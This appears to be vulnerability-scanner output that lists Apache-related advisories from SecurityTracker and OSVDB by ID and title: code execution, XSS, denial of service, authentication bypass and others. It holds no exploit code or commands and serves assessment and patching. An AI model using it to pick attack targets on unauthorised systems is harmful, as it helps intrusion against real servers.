15842| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
15843| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
15844| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
15845| [1024096] Apache mod_proxy_http May Return Results for a Different Request
15846| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
15847| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
15848| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
15849| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
15850| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
15851| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
15852| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
15853| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
15854| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
15855| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
15856| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
15857| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
15858| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
15859| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15860| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
15861| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
15862| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
15863| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
15864| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
15865| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
15866| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
15867| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
15868| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
15869| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
15870| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
15871| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
15872| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
15873| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
15874| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
15875| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
15876| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
15877| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
15878| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
15879| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
15880| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
15881| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
15882| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
15883| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
15884| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
15885| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
15886| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
15887| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
15888| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
15889| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
15890| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
15891| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
15892| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
15893| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
15894| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
15895| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
15896| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
15897| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
15898| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
15899| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
15900| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
15901| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
15902| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
15903| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
15904| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
15905| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
15906| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
15907| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
15908| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
15909| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
15910| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
15911| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
15912| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
15913| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
15914| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
15915| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
15916| [1008920] Apache mod_digest May Validate Replayed Client Responses
15917| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
15918| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
15919| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
15920| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
| [1008030] Apache mod_rewrite Contains a Buffer Overflow
| [1008029] Apache mod_alias Contains a Buffer Overflow
| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
|
| OSVDB - http://www.osvdb.org:
| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
| [96077] Apache CloudStack Global Settings Multiple Field XSS
| [96076] Apache CloudStack Instances Menu Display Name Field XSS
| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
| [94279] Apache Qpid CA Certificate Validation Bypass
| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
| [94042] Apache Axis JAX-WS Java Unspecified Exposure
| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
| [93541] Apache Solr json.wrf Callback XSS
| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
| [93521] Apache jUDDI Security API Token Session Persistence Weakness
| [93520] Apache CloudStack Default SSL Key Weakness
| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
| [93515] Apache HBase table.jsp name Parameter XSS
| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
| [93252] Apache Tomcat FORM Authenticator Session Fixation
| [93172] Apache Camel camel/endpoints/ Endpoint XSS
| [93171] Apache Sling HtmlResponse Error Message XSS
| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
| [93168] Apache Click ErrorReport.java id Parameter XSS
| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
| [93144] Apache Solr Admin Command Execution CSRF
| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
| [92748] Apache CloudStack VM Console Access Restriction Bypass
| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
| [92706] Apache ActiveMQ Debug Log Rendering XSS
| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
| [92270] Apache Tomcat Unspecified CSRF
| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
| [86901] Apache Tomcat Error Message Path Disclosure
| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
| [85430] Apache mod_pagespeed Module Unspecified XSS
| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
| [85249] Apache Wicket Unspecified XSS
| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
